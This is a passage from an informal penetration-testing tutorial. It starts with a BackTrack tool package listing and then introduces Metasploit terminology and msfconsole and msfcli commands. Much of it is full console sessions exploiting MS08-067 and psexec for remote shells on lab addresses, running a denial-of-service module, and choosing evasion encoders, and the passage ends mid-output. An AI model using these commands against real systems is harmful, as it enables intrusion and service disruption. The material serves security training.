vulnerabilities that ii w3m 0.5.2-2.1ubuntu1.2 WWW browsable pager with excellent tables/frames support ii waffit 0.9.0-bt1 WAFW00F allows one to identify and fingerprint WAF products protecting a website. ii wapiti 2.2.1-bt2 Web application vulnerability scanner, & security auditor. ii warvox 1.0.1-bt1 WarVOX is a suite of tools for exploring, classifying, and auditing telephone systems. ii wbar 1.3.3+dfsg2-1 light and fast launch bar ii wbarconf 0.7.2-bt2 wbar configuration gui written with Python and GTK. ii websecurify 0.8-bt0 Websecurify is a powerful web application security testing environment designed from the ground up to provide the best combination of automatic and manual ii webshag 1.10-bt3 Webshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing l ii webshells 1.0-bt1 collection of web shell ii webslayer rev5-bt0 A tool designed for bruteforcing Web Applications. ii weevely 0.3-bt0 Weevely generate PHP code to trojanize a web server, and act like a client to estabilish a telnet-like connection or inject addictional function on backdo ii wepcrack 0.1-bt2 WEPCrack is an open source tool for breaking 802.11 WEP secret keys. ii wfuzz 1.4c-bt1 Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), brutefo ii wget 1.12-1.1ubuntu2.1 retrieves files from the web ii whatweb 0.4.7-bt3 WhatWeb identifies websites. ii whiptail 0.52.10-5ubuntu1 Displays user-friendly dialog boxes from shell scripts ii wicd 1.7.0+ds1-2 wired and wireless network manager - metapackage ii wicd-daemon 1.7.0+ds1-2 wired and wireless network manager - daemon ii wicd-gtk 1.7.0+ds1-2 wired and wireless network manager - GTK+ client ii wifitap 0.4.0-bt2 WiFi injection tool through tun/tap device ii winbind 2:3.4.7~dfsg-1ubuntu3.6 Samba nameservice integration server ii windows-binaries 1.0-bt0 Various windows pentesting binaries. ii wine 1.2.2-0ubuntu2~lucid1 Microsoft Windows Compatibility Layer (dummy package) ii wine1.2 1.2.2-0ubuntu2~lucid1 Microsoft Windows Compatibility Layer (Binary Emulator and Library) ii wine1.2-gecko 1.0.0-0ubuntu4 Microsoft Windows Compatibility Layer (Web Browser) ii wireless-crda 1.12 Wireless Central Regulatory Domain Agent ii wireless-tools 30~pre9-3ubuntu4 Tools for manipulating Linux Wireless Extensions ii wireshark 1.4.7-bt0 A network "sniffer" - a tool that captures and analyzes packets off the wire. ii wordlists 1.0-bt0 wordlists ii wpasupplicant 0.6.9-3ubuntu3 client support for WPA and WPA2 (IEEE 802.11i) ii wstool 0.14001-bt4 WSTOOL is OS-independence Web vulnerable scanner. ii x-ttcidfont-conf 32 TrueType and CID fonts configuration for X ii x11-apps 7.5+1ubuntu2 X applications ii x11-common 1:7.5+5ubuntu1 X Window System (X.Org) infrastructure ii x11-session-utils 7.5+1 X session utilities ii x11-utils 7.5+3 X11 utilities ii x11-xfs-utils 7.4+1build2 X font server utilities ii x11-xkb-utils 7.5+1 X11 XKB utilities ii x11-xserver-utils 7.5+1ubuntu2.1 X server utilities ii x11proto-core-dev 7.0.16-1 X11 core wire protocol and auxiliary headers ii x11proto-input-dev 2.0-2 X11 Input extension wire protocol ii x11proto-kb-dev 1.0.4-1 X11 XKB extension wire protocol ii xauth 1:1.0.4-1 X authentication utility ii xbase-clients 1:7.5+5ubuntu1 miscellaneous X clients - metapackage ii xbitmaps 1.1.0-1 Base X bitmaps ii xdg-utils 1.0.2-6.1ubuntu3.1 desktop integration utilities from freedesktop.org ii xfonts-base 1:1.0.1 standard fonts for X ii xfonts-encodings 1:1.0.3-1 Encodings for X.Org fonts ii xfonts-utils 1:7.5+2 X Window System font utility programs ii xgps 1.1.5-bt0 xGPS is a free project aiming to bring powerful and easy to use navigation software ii xinit 1.2.0-1 X server initialisation tool ii xkb-data 1.8-1ubuntu8.1~10.04.1 X Keyboard Extension (XKB) configuration data ii xml-core 0.13 XML infrastructure and XML catalog file support ii xplico 0.6.3-bt0 The goal of Xplico is extract from an internet traffic capture the applications data contained. ii xprobe2 2.1-bt2 Active OS fingerprinting tool. ii xresprobe 0.4.24ubuntu9 X Resolution Probe ii xserver-common 2:1.7.6-2ubuntu7.6 common files used by various X servers ii xserver-xephyr 2:1.7.6-2ubuntu7.6 nested X server ii xserver-xorg 1:7.5+5ubuntu1 the X.Org X server ii xserver-xorg-core 2:1.7.6-2ubuntu7.6 Xorg X server - core server ii xserver-xorg-input-all 1:7.5+5ubuntu1 the X.Org X server -- input driver metapackage ii xserver-xorg-input-evdev 1:2.3.2-5ubuntu1 X.Org X server -- evdev input driver ii xserver-xorg-input-mouse 1:1.5.0-1 X.Org X server -- mouse input driver ii xserver-xorg-input-synaptics 1.2.2-1ubuntu4 Synaptics TouchPad driver for X.Org server ii xserver-xorg-input-vmmouse 1:12.6.5-4ubuntu2 X.Org X server -- VMMouse input driver to use with VMWare ii xserver-xorg-input-wacom 1:0.10.5-0ubuntu4.1 X.Org X server -- Wacom input driver ii xserver-xorg-video-all 1:7.5+5ubuntu1 the X.Org X server -- output driver metapackage ii xserver-xorg-video-apm 1:1.2.2-1 X.Org X server -- APM display driver ii xserver-xorg-video-ark 1:0.7.2-1 X.Org X server -- ark display driver ii xserver-xorg-video-ati 1:6.13.0-1ubuntu5 X.Org X server -- AMD/ATI display driver wrapper ii xserver-xorg-video-chips 1:1.2.2-1 X.Org X server -- Chips display driver ii xserver-xorg-video-cirrus 1:1.3.2-1ubuntu1 X.Org X server -- Cirrus display driver ii xserver-xorg-video-fbdev 1:0.4.1-1ubuntu1 X.Org X server -- fbdev display driver ii xserver-xorg-video-geode 2.11.11-1~lucid1 X.Org X server -- Geode GX2/LX display driver ii xserver-xorg-video-i128 1:1.3.3-1 X.Org X server -- i128 display driver ii xserver-xorg-video-i740 1:1.3.2-1 X.Org X server -- i740 display driver ii xserver-xorg-video-intel 2:2.9.1-3ubuntu5 X.Org X server -- Intel i8xx, i9xx display driver ii xserver-xorg-video-mach64 6.8.2-2 X.Org X server -- ATI Mach64 display driver ii xserver-xorg-video-mga 1:1.4.11.dfsg-2ubuntu1 X.Org X server -- MGA display driver ii xserver-xorg-video-neomagic 1:1.2.4-2 X.Org X server -- Neomagic display driver ii xserver-xorg-video-nouveau 1:0.0.15+git20100219+9b4118d-0ubuntu5 X.Org X server -- Nouveau display driver (experimental) ii xserver-xorg-video-nv 1:2.1.15-1ubuntu3 X.Org X server -- NV display driver ii xserver-xorg-video-openchrome 1:0.2.904+svn827-1 X.Org X server -- VIA display driver ii xserver-xorg-video-r128 6.8.1-2ubuntu1 X.Org X server -- ATI r128 display driver ii xserver-xorg-video-radeon 1:6.13.0-1ubuntu5 X.Org X server -- AMD/ATI Radeon display driver ii xserver-xorg-video-rendition 1:4.2.3-1 X.Org X server -- Rendition display driver ii xserver-xorg-video-s3 1:0.6.3-1 X.Org X server -- legacy S3 display driver ii xserver-xorg-video-s3virge 1:1.10.4-1 X.Org X server -- S3 ViRGE display driver ii xserver-xorg-video-savage 1:2.3.1-1ubuntu1 X.Org X server -- Savage display driver ii xserver-xorg-video-siliconmotion 1:1.7.3-1 X.Org X server -- SiliconMotion display driver ii xserver-xorg-video-sis 1:0.10.2-2 X.Org X server -- SiS display driver ii xserver-xorg-video-sisusb 1:0.9.3-1 X.Org X server -- SiS USB display driver ii xserver-xorg-video-tdfx 1:1.4.3-1 X.Org X server -- tdfx display driver ii xserver-xorg-video-trident 1:1.3.3-1 X.Org X server -- Trident display driver ii xserver-xorg-video-tseng 1:1.2.3-1 X.Org X server -- Tseng display driver ii xserver-xorg-video-v4l 1:0.2.0-4 X.Org X server -- Video 4 Linux display driver ii xserver-xorg-video-vesa 1:2.3.0-1ubuntu1 X.Org X server -- VESA display driver ii xserver-xorg-video-vmware 1:10.16.9-1 X.Org X server -- VMware display driver ii xserver-xorg-video-voodoo 1:1.2.3-1 X.Org X server -- Voodoo display driver ii xsltproc 1.1.26-1ubuntu1 XSLT command line processor ii xssed 1.0-bt1 Firefox link to XSSED.com . ii xsser 1.5-bt2 Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based aplications. ii xssfuzz 1.1-bt1 It’s for finding new vectors and testing those within the context of multiple encoding methods. ii xterm 256-1ubuntu1 X terminal emulator ii xtrans-dev 1.2.5-1 X transport library (development files) ii xulrunner-1.9.2 1.9.2.17+build3+nobinonly- 0ubuntu0.10.04.1 XUL + XPCOM application runner ii xutils-dev 1:7.5+2 X Window System utility programs for development ii xz-utils 4.999.9beta+20091116-1 XZ-format compression utilities ii yelp 2.30.0-0ubuntu2 Help browser for GNOME ii yersinia 0.7.1-bt0 A network tool designed to take advantage of some weakeness in different network protocols. ii zenity 2.30.0-0ubuntu1 Display graphical dialog boxes from shell scripts ii zip 3.0-2 Archiver for .zip files ii zlib1g 1:1.2.3.3.dfsg-15ubuntu1 compression library - runtime ii zlib1g-dev 1:1.2.3.3.dfsg-15ubuntu1 compression library - development

End of the tools.

Chapter 2:The Metasploit Framework

This chapter introduces you to the most reputed framework. The metasploit framework.

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.Its most well- known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. For those who don’t like History , Let the game begin.

Terminology:

Exploit:

An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities (such as SQL injection), and configuration errors.

Payload

A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt (see Chapter 5), whereas a bind shell is a payload that

“binds” a command prompt to a listening port on the target machine, which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.

Shellcode

Shellcode is a set of instructions used as a payload when exploitation occurs.

Shellcode is typically written in assembly language. In most cases, a command shell or a Meterpreter shell will be provided after the series of instructions have been performed by the target machine, hence the name.

Module

A module in the context of this book is a piece of software that can be used by the Metasploit Framework. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes the Framework so powerful.

Listener

A listener is a component within Metasploit that waits for an incoming connection of some sort. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.

Metasploit Interfaces:

MSFconsole

Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and wellsupported tools within the Framework. Msfconsole provides a handy all-in- one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.

Although the Metasploit Framework is constantly changing, a subset of commands remain relatively constant. By mastering the basics of msfconsole, you will be able to keep up with any changes. To illustrate the importance of learning msfconsole, it will be used in nearly every chapter of the book.

To launch msfconsole, enter msfconsole at the command line:

To know the help do this, like to know about connect you can use: And for those who are into more graphical oriented and want to try different approach look for Armitage. I would like to tell you guys that the msfconsole is what most of the hackers use.

Msfcli

Msfcli provides a powerful command-line interface to the framework.Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.

______root@bt4:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.201 PAYLOAD=windows/shell/bind_tcp E [*] Please wait while we load the module tree... =[ metasploit v3.5.1-dev [core:3.5 api:1.0] + -- --=[ 676 exploits - 328 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r11084 updated today (2010.11.21) RHOST => 192.168.1.201 PAYLOAD => windows/shell/bind_tcp [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX)

[*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.1.201 [*] Command shell session 1 opened (192.168.1.101:35009 -> 192.168.1.201:4444) at 2010- 11-21 14:44:42 -0700 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>

If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck.Thats why they say backtrack is like giving gun to monkeys.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree... Name Current Setting Required Description ------RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

To display the payloads that are available for the current module, append the letter 'P' to the command-line string. root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 P [*] Please wait while we load the module tree... Compatible payloads ======Name Description ------generic/debug_trap Generate a debug trap in the target process ...snip... The other options available to msfcli are available by issuing 'msfcli -h'.

Benefits of mscli Supports the launching of exploits and auxiliary modules Useful for specific tasks Good for learning Convenient to use when testing or developing a new exploit Good tool for one-off exploitation Excellent if you know exactly which exploit and options you need Wonderful for use in scripts and basic automation

The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.

The next section have been copy pasted from metasploit unleased so formatting is bad hope that you look for knowledge not the format.The best way to learn the framework is to type the commands in console while you go through the section. Tab Completion

The msfconsole is designed to be fast to use and one of the features that helps this goal is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module you wish to make use of. As with most other shells, entering what you know and pressing 'Tab' will present you with a list of options available to you or auto-complete the string if there is only one option. Tab completion depends on the ruby readline extension and nearly every command in the console supports tab completion.

use exploit/windows/dce use .*netapi.* set LHOST show set TARGET set PAYLOAD windows/shell/ exp msf > use exploit/windows/smb/ms use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/ms06_040_netapi use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/msdns_zonename msf > use exploit/windows/smb/ms08_067_netapi

The back Command

Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally. msf auxiliary(ms09_001_write) > back msf >

The check Command

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

msf exploit(ms04_045_wins) > show options Module options:

Name Current Setting Required Description ------RHOST 192.168.1.114 yes The target address RPORT 42 yes The target port Exploit target: Id Name ------0 Windows 2000 English msf exploit(ms04_045_wins) > check

[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

The connect Command

There is a miniature netcat clone built into the msfconsole that supports SSL, proxies, pivoting, and file sends. By issuing the 'connect' command with an ip address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet. msf > connect 192.168.1.1 23

[*] Connected to 192.168.1.1:23 ÿýÿýÿý!ÿûÿû DD-WRT v24 std (c) 2008 NewMedia-NET GmbH Release: 07/27/08 (SVN revision: 10011) ÿ DD-WRT login:

By passing the '-s' argument to connect, it will connect via SSL: msf > connect -s www.metasploit.com 443 [*] Connected to www.metasploit.com:443 GET / HTTP/1.0 HTTP/1.1 302 Found Date: Sat, 25 Jul 2009 05:03:42 GMT Server: Apache/2.2.11 Location: http://www.metasploit.org/ exploit vs. run

When launching an exploit, you issue the 'exploit' command whereas if you are using an auxiliary module, the proper usage is 'run' although 'exploit' will work as well. msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host... datalenlow=65535 dataoffset=65535 fillersize=72 rescue datalenlow=55535 dataoffset=65535 fillersize=72 rescue datalenlow=45535 dataoffset=65535 fillersize=72 rescue datalenlow=35535 dataoffset=65535 fillersize=72 rescue datalenlow=25535 dataoffset=65535 fillersize=72 rescue ...snip.. .

The irb Command

Running the 'irb' command will drop you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is also very useful for understanding the internals of the Framework. msf > irb [*] Starting IRB shell... >> puts "Hello, metasploit!" Hello, metasploit! >> Framework::Version => "3.3-dev" >> framework.modules.keys.length =>744

The jobs Command

Jobs are modules that are running in the background. The 'jobs' command provides the ability to list and terminate these jobs. msf exploit(ms08_067_netapi) > jobs -h

Usage: jobs [options] Active job manipulation and interaction. OPTIONS: -K Terminate all running jobs. -h Help banner. -k Terminate the specified job name. -l list all running jobs.

The load Command

The 'load' command loads a plugin from Metasploit's 'plugin' directory. Arguments are passed as 'key=val' on the shell. msf > load Usage: load [var=val var=val ...] Load a plugin from the supplied path. The optional var=val options are custom parameters that can be passed to plugins. msf > load pcap_log [*] Successfully loaded plugin: pcap_log

"unload" Command Conversely, the 'unload' command unloads a previously loaded plugin and removes any extended commands. msf > load pcap_log [*] Successfully loaded plugin: pcap_log msf > unload pcap_log Unloading plugin pcap_log...unloaded. "loadpath" Command The 'loadpath' command will load a third-part module tree for the path so you can point Metasploit at your 0-day exploits, encoders, payloads, etc. msf > loadpath /home/secret/modules Loaded 0 modules.

The resource Command

Some attacks such as Karmetasploit use a resource (batch) file that you can load through the msfconsole using the 'resource' command. These files are a basic scripting for msfconsole. It runs the commands in the file in sequence. Later on we will discuss how, outside of Karmetasploit, that can be very useful. msf > resource karma.rc resource> load db_sqlite3 [-] [-] The functionality previously provided by this plugin has been [-] integrated into the core command set. Use the new 'db_driver' [-] command to use a database driver other than sqlite3 (which [-] is now the default). All of the old commands are the same. [-] [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin resource> db_create /root/karma.db [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/karma.db resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 10.0.0.1 AUTOPWN_HOST => 10.0.0.1 ...snip...

Batch files can greatly speed up testing and development times as well as allow the user to automate many tasks. Besides loading a batch file from within msfconsole, they can also be passed at startup using the '-r' flag. The simple example below creates a batch file to display the Metasploit version number at startup. root@bt4-pre:/pentest/exploits/framework3# echo version > version.rc root@bt4-pre:/pentest/exploits/framework3# ./msfconsole -r version.rc

=[ metasploit v3.3-rc1 [core:3.3 api:1.0] + -- --=[ 379 exploits - 234 payloads + -- --=[ 20 encoders - 7 nops =[ 155 aux resource> version Framework: 3.3-dev.6055 Console : 3.3-dev.6476 msf >

The route Command The "route" command in Metasploit allows you to route sockets through a session or 'comm', providing basic pivoting capabilities. To add a route, you pass the target subnet and network mask followed by the session (comm) number. msf exploit(ms08_067_netapi) > route Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local. msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2 msf exploit(ms08_067_netapi) > route print Active Routing Table ======Subnet Netmask Gateway ------192.168.1.0 255.255.255.0 Session 2

The info Command The 'info' command will provide detailed information about a particular module including all options, targets, and other information. Be sure to always read the module description prior to using it as some may have un-desired effects.

The info command also provides the following information: The author and licensing information Vulnerability references (ie: CVE, BID, etc) Any payload restrictions the module may have msf > info dos/windows/smb/ms09_001_write Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset Version: 6890 License: Metasploit Framework License (BSD) Provided by: j.v.vallejo The set/unset Commands The 'set' command allows you to configure Framework options and parameters for the current module you are working with. msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 msf auxiliary(ms09_001_write) > show options Module options: Name Current Setting Required Description ------RHOST 192.168.1.1 yes The target address RPORT 445 yes Set the SMB service port

A recently added feature in Metasploit is the ability to set an encoder to use at runtime. This is particularly useful in exploit development when you aren't quite certain as to which payload encoding methods will work with an exploit. msf exploit(ms08_067_netapi) > show encoders Compatible encoders ======Name Description ------cmd/generic_sh Generic Shell Variable Substitution Command Encoder generic/none The "none" Encoder mipsbe/longxor XOR Encoder mipsle/longxor XOR Encoder php/base64 PHP Base64 encoder ppc/longxor PPC LongXOR Encoder ppc/longxor_tag PPC LongXOR Encoder sparc/longxor_tag SPARC DWORD XOR Encoder x64/xor XOR Encoder x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower Avoid UTF8/tolower x86/call4_dword_xor Call+4 Dword XOR Encoder x86/countdown Single-byte XOR Countdown Encoder x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive Polymorphic Jump/Call XOR Additive Feedback Encoder x86/nonalpha Non-Alpha Encoder x86/nonupper Non-Upper Encoder x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai encoder => x86/shikata_ga_nai "unset" Command

The opposite of the 'set' command, of course, is 'unset'. 'Unset' removes a parameter previously configured with 'set'. You can remove all assigned variables with 'unset all'. msf > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf > set THREADS 50 THREADS => 50 msf > set Global ======Name Value ------RHOSTS 192.168.1.0/24 THREADS 50 msf > unset THREADS Unsetting THREADS... msf > unset all Flushing datastore... msf > set Global ======No entries in data store.

The sessions Command The 'sessions' command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc. msf > sessions Usage: sessions [options] Active session manipulation and interaction. OPTIONS: -d Detach an interactive session -h Help banner. -i Interact with the supplied session identifier. -k Terminate session. -l List all active sessions. -q Quiet mode. -v List verbose fields. To list any active sessions, pass the '-l' options to 'sessions'. msf exploit(3proxy) > sessions -l Active sessions ======Id Description Tunnel ------1 Command shell 192.168.1.101:33191 -> 192.168.1.104:4444 To interact with a given session, you just need to use the '-i' switch followed by the Id number of the session. msf exploit(3proxy) > sessions -i 1 [*] Starting interaction with 1... C:\WINDOWS\system32>

The search Command The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for you can search for it via 'search '. In the output below, a search is being made for MS Bulletin MS09-011. The search function will locate this string within the module names, descriptions, references, etc. Note the naming convention for Metasploit modules uses underscores versus hyphens. msf > search ms09-001 [*] Searching loaded modules for pattern 'ms09-001'... Auxiliary ======Name Description ------dos/windows/smb/ms09_001_write Microsoft SRV.SYS WriteAndX Invalid DataOffset

The show Command Entering 'show' at the msfconsole prompt will display every module within Metasploit. msf > show Encoders ======Name Description ------cmd/generic_sh Generic Shell Variable Substitution Command Encoder generic/none The "none" Encoder mipsbe/longxor XOR Encoder ...snip... There are a number of 'show' commands you can use but the ones you will use most frequently are 'show auxiliary', 'show exploits', 'show payloads', 'show encoders', and 'show nops'. Executing 'show auxiliary' will display a listing of all of the available auxiliary modules within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more. msf > show auxiliary Auxiliary ======Name Description ------admin/backupexec/dump Veritas Backup Exec Windows Remote File Access admin/backupexec/registry Veritas Backup Exec Server Registry Access admin/cisco/ios_http_auth_bypass Cisco IOS HTTP Unauthorized Administrative Access ...snip... Naturally, 'show exploits' will be the command you are most interested in running since at its core, Metasploit is all about exploitation. Run 'show exploits' to get a listing of all exploits contained in the framework. msf > show exploits Exploits ======Name Description ------aix/rpc_ttdbserverd_realpath ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow ...snip...

Running 'show payloads' will display all of the different payloads for all platforms available within Metasploit. msf > show payloads Payloads ======Name Description ------aix/ppc/shell_bind_tcp AIX Command Shell, Bind TCP Inline aix/ppc/shell_find_port AIX Command Shell, Find Port Inline aix/ppc/shell_reverse_tcp AIX Command Shell, Reverse TCP Inline ...snip... As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads. msf exploit(ms08_067_netapi) > show payloads Compatible payloads ======Name Description ------generic/debug_trap Generic x86 Debug Trap generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6) generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX or Win7) ...snip... If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module. msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ------RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name ------0 Automatic Targeting If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported. msf exploit(ms08_067_netapi) > show targets Exploit targets: Id Name ------0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX) 5 Windows 2003 SP0 Universal ...snip... If you wish the further fine-tune an exploit, you can see more advanced options by running 'show advanced'. msf exploit(ms08_067_netapi) > show advanced Module advanced options: Name : CHOST Current Setting: Description : The local client address Name : CPORT Current Setting: Description : The local client port ...snip... Running 'show encoders' will display a listing of the encoders that are available within MSF. msf > show encoders Encoders ======Name Description ------cmd/generic_sh Generic Shell Variable Substitution Command Encoder generic/none The "none" Encoder mipsbe/longxor XOR Encoder mipsle/longxor XOR Encoder php/base64 PHP Base64 encoder ppc/longxor PPC LongXOR Encoder ppc/longxor_tag PPC LongXOR Encoder sparc/longxor_tag SPARC DWORD XOR Encoder x64/xor XOR Encoder x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower Avoid UTF8/tolower x86/call4_dword_xor Call+4 Dword XOR Encoder x86/countdown Single-byte XOR Countdown Encoder x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive Jump/Call XOR Additive Feedback Encoder x86/nonalpha Non-Alpha Encoder x86/nonupper Non-Upper Encoder x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder

Lastly, issuing the 'show nops' command will display the NOP Generators that Metasploit has to offer. msf > show nops NOP Generators ======Name Description ------armle/simple Simple php/generic PHP Nop Generator ppc/simple Simple sparc/random SPARC NOP generator tty/generic TTY Nop Generator x64/simple Simple x86/opty2 Opty2 x86/single_byte Single Byte

The setg Command In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time your start msfconsole. However, the pitfall is forgetting you have saved globals, so always check your options before you "run" or "exploit". Conversely, you can use the "unsetg" command to unset a global variable. In the examples that follow, variables are entered in all-caps (ie: LHOST), but Metasploit is case-insensitive so it is not necessary to do so. msf > setg LHOST 192.168.1.101 LHOST => 192.168.1.101 msf > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf > setg RHOST 192.168.1.136 RHOST => 192.168.1.136

After setting your different variables, you can run the 'save' command to save your current environment and settings. With your settings saved, they will be automatically loaded on startup which saves you from having to set everything again. msf > save Saved configuration to: /root/.msf3/config msf >

The use Command When you have decided on a particular module to make use of, issue the 'use' command to select it. The 'use' command changes your context to a specific module, exposing type-specific commands. Notice in the output below that any global variables that were previously set are already configured. msf > use dos/windows/smb/ms09_001_write msf auxiliary(ms09_001_write) > show options Module options: Name Current Setting Required Description ------RHOST yes The target address RPORT 445 yes Set the SMB service port msf auxiliary(ms09_001_write) > Metasploit Exploits All exploits in the Metasploit Framework will fall into two categories: active and passive. Active Exploits Active exploits will exploit a specific host, run until completion, and then exit. Brute-force modules will exit when a shell opens from the victim. Module execution stops if an error is encountered. You can force an active module to the background by passing '-j' to the exploit command: msf exploit(ms08_067_netapi) > exploit -j [*] Exploit running as background job. msf exploit(ms08_067_netapi) >

Active Exploit Example The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system. msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.1.104 RHOST => 192.168.1.104 msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.101 LHOST => 192.168.1.101 msf exploit(psexec) > set LPORT 4444 LPORT => 4444 msf exploit(psexec) > set SMBUSER victim SMBUSER => victim msf exploit(psexec) > set SMBPASS s3cr3t SMBPASS => s3cr3t msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user 'victim'... [*] Uploading payload... [*] Created \hikmEeEM.exe... [*] Binding to 367abb81-9844-35f1-ad32- 98f038001003:2.0@ncacn_np:192.168.1.104[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.104[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hikmEeEM.exe... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1073) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 